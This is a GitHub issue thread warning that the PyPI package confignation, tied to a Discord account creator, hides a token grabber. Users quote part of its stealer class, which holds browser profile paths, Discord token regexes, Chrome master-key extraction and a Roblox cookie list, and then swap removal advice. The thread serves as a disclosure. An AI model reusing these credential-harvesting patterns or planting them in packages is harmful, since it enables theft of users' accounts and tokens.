### ISSUE TITLE
Contains token grabber in his own library confignation

### ISSUE THREAD

**Issue by m0ney-dev** [imvast/Discord-Account-Creator#9]
https://pypi.org/project/confignation/#description

Uses

"class SynCheckX(Functions):
    def __init__(self):
        self.webhook = self.fetch_conf('webhook')
        self.discordApi = "https://discord.com/api/v9/users/@me"
        self.appdata = os.getenv("localappdata")
        self.roaming = os.getenv("appdata")
        self.chrome_user_data = ntpath.join(self.appdata, 'Google', 'Chrome', 'User Data')
        self.brave_user_data = ntpath.join(self.appdata, 'BraveSoftware', 'Brave-Browser' 'User Data')
        self.dir, self.temp = mkdtemp(), gettempdir()
        inf, net = self.system_info(), self.network_info()
        self.hwid, self.winver, self.winkey = inf[0], inf[1], inf[2]
        self.ip, self.city, self.country, self.region, self.org, self.loc, self.googlemap = net[0], net[1], net[2], net[3], net[4], net[5], net[6]
        self.startup_loc = ntpath.join(self.roaming, 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')

        self.hook_reg = "api/webhooks"
        self.chrome_reg = re.compile(r'(^profile\s\d*)|default|(guest profile$)', re.IGNORECASE | re.MULTILINE)
        self.regex = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        self.encrypted_regex = r"dQw4w9WgXcQ:[^\"]*"

        self.sep = os.sep
        self.tokens = []
        self.robloxcookies = []
        self.chrome_key = self.get_master_key(ntpath.join(self.chrome_user_data, "Local State"))"

"    async def bypassTokenProtector(self):
        # fucks up the discord token protector by https://github.com/andro2157/DiscordTokenProtector"

Stay away from this 16 yo skid.

**Comment by JokersCat** [comment]
how to remove it? I already changed my password and stuff but I cant find it in the start Menu or in the Registry Entry. Btw where can I find the grabber?

**Comment by vepacoding** [comment]
> https://pypi.org/project/confignation/#description
> 
> Uses
> 
> "class SynCheckX(Functions): def **init**(self): self.webhook = self.fetch_conf('webhook') self.discordApi = "https://discord.com/api/v9/users/@me" self.appdata = os.getenv("localappdata") self.roaming = os.getenv("appdata") self.chrome_user_data = ntpath.join(self.appdata, 'Google', 'Chrome', 'User Data') self.brave_user_data = ntpath.join(self.appdata, 'BraveSoftware', 'Brave-Browser' 'User Data') self.dir, self.temp = mkdtemp(), gettempdir() inf, net = self.system_info(), self.network_info() self.hwid, self.winver, self.winkey = inf[0], inf[1], inf[2] self.ip, self.city, self.country, self.region, self.org, self.loc, self.googlemap = net[0], net[1], net[2], net[3], net[4], net[5], net[6] self.startup_loc = ntpath.join(self.roaming, 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
> 
> ```
>     self.hook_reg = "api/webhooks"
>     self.chrome_reg = re.compile(r'(^profile\s\d*)|default|(guest profile$)', re.IGNORECASE | re.MULTILINE)
>     self.regex = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
>     self.encrypted_regex = r"dQw4w9WgXcQ:[^\"]*"
> 
>     self.sep = os.sep
>     self.tokens = []
>     self.robloxcookies = []
>     self.chrome_key = self.get_master_key(ntpath.join(self.chrome_user_data, "Local State"))"
> ```
> 
> " async def bypassTokenProtector(self): # fucks up the discord token protector by https://github.com/andro2157/DiscordTokenProtector"
> 
> Stay away from this 16 yo skid.

L bozo vast on top

**Comment by cheehong1030** [comment]
> how to remove it? I already changed my password and stuff but I cant find it in the start Menu or in the Registry Entry. Btw where can I find the grabber?

`pip uninstall confignation` and reset your password

**Comment by JokersCat** [comment]
maybe also uninstall and install discord because of the injection into discord right?

**Comment by JokersCat** [comment]
oh and btw he disabled the add to startup thing so no worries about that I guess

**Comment by cheehong1030** [comment]
> oh and btw he disabled the add to startup thing so no worries about that I guess

This is the new version of token grabber
You know what's going on when you look at the source code
https://github.com/Rdimo/Hazard-Token-Grabber-V2

**Comment by cheehong1030** [comment]
i think he just want to get token only 
lmao that kid

**Comment by TDScripts** [comment]
I could pull request remove the TK grabber and repost it

**Comment by TDScripts** [comment]
I mean fork it
